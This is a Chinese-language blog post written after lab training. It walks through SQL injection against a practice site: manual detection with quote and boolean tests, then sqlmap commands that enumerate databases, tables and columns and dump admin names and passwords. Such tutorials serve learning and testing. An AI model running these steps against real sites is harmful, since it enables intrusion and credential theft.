無處不在的SQL注入

實訓(xùn)中學(xué)習(xí)了一下sql注入。于是在i春秋發(fā)現(xiàn)了簡單的sql注入于是就做的玩了玩。
【無處不在的SQL注入】

下面是一些總結(jié):

第一步 手工檢測判斷注入點

在網(wǎng)站中查找一個url中帶有id 的網(wǎng)址http://www.test.ichunqiu/Art_Show.php?id=2
首先在id=2后面加一個單引號來判斷這是否是一個注入點,返回了一個錯誤提示更新點擊數(shù)出現(xiàn)錯誤!。現(xiàn)在替換一個注入查詢語句換成 and 1=1,頁面并沒有出現(xiàn)變化再換成 and 1=2返回一個錯誤提示。
\
提示:
這里出現(xiàn)了一個錯誤提示,更新點擊數(shù)出現(xiàn)錯誤,這樣說明我們輸入的and 1=1 和and 1=2在數(shù)據(jù)庫內(nèi)執(zhí)行了,因為and 1=1這條查詢語句就永為真,它就會繼續(xù)執(zhí)行,and 1=2 這條語句就為假,查詢語句無法繼續(xù)執(zhí)行,就會返回錯誤,這樣我們就可以初步判斷這個url地址是一個注入點。

第二步 利用sqlmap對注入點進行注入

首先找到文件sqlmap.py所在文件夾,然后在cmd運行python sqlmap.py –u "http://www.test.ichunqiu/Art_Show.php?id=2"


返回信息:

返回信息提示這是一個注入點并且返回對方系統(tǒng)的信息,系統(tǒng)是windows,Web容器是apache2.4.9版本,語言php5.2.17版本,目標數(shù)據(jù)庫是mysql5.0.11版本。

第三步 獲取數(shù)據(jù)庫內(nèi)信息
  1. 獲取有多少個database
    Python sqlmap.py –u "http://www.test.ichunqiu/Art_Show.php?id=2" --dbs

    返回信息:

    獲取數(shù)據(jù)庫內(nèi)所有數(shù)據(jù)庫的名稱,返回信息目標數(shù)據(jù)庫內(nèi)有四個數(shù)據(jù)庫mys ,mysql, test, information_schema
  2. 查看網(wǎng)站所依賴的數(shù)據(jù)庫的名稱
    Python sqlmap.py –u "http://www.test.ichunqiu/Art_Show.php?id=2" --current–db

    返回信息:

    當(dāng)前使用的數(shù)據(jù)庫是mys
  3. 獲取指定數(shù)據(jù)庫內(nèi)表的信息
    Python sqlmap.py –u "http://www.test.ichunqiu/Art_Show.php?id=2" -D mys --tables

    返回信息:
  4. 獲取指定數(shù)據(jù)庫內(nèi)表的字段信息
    Python sqlmap.py –u "http://www.test.ichunqiu/Art_Show.php?id=2" -D mys -T zzcms_admin --columns

    返回信息:
  5. 獲取獲取指定數(shù)據(jù)庫內(nèi)表的特定字段內(nèi)容信息
    Python sqlmap.py –u "http://www.test.ichunqiu/Art_Show.php?id=2" -D mys -T zzcms_admin –C name,password --dump

    返回信息:
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
平臺聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點,簡書系信息發(fā)布平臺,僅提供信息存儲服務(wù)。

推薦閱讀更多精彩內(nèi)容

  • sqlmap用戶手冊 說明:本文為轉(zhuǎn)載,對原文中一些明顯的拼寫錯誤進行修正,并標注對自己有用的信息。 ======...
    wind_飄閱讀 2,085評論 0 5
  • 可以看見url里有一個id=2,可以根據(jù)這個判斷他是由get請求進行提交的,因為通過get請求提交的,提交的數(shù)據(jù)會...
    fatfatEddy閱讀 373評論 0 0
  • http://192.168.136.131/sqlmap/mysql/get_int.php?id=1 當(dāng)給sq...
    xuningbo閱讀 10,407評論 2 22
  • sqlmap是一個開源的滲透測試工具,可以用來進行自動化檢測,利用SQL注入漏洞,獲取數(shù)據(jù)庫服務(wù)器的權(quán)限。它具有功...
    道書簡閱讀 1,443評論 0 0
  • 1.9(實驗)如何使用SQLMap進行MySQL數(shù)據(jù)庫注入 第一步:打開目標地址,先手工檢查一下是否存在注入點。 ...
    小哥哥_020e閱讀 1,653評論 0 0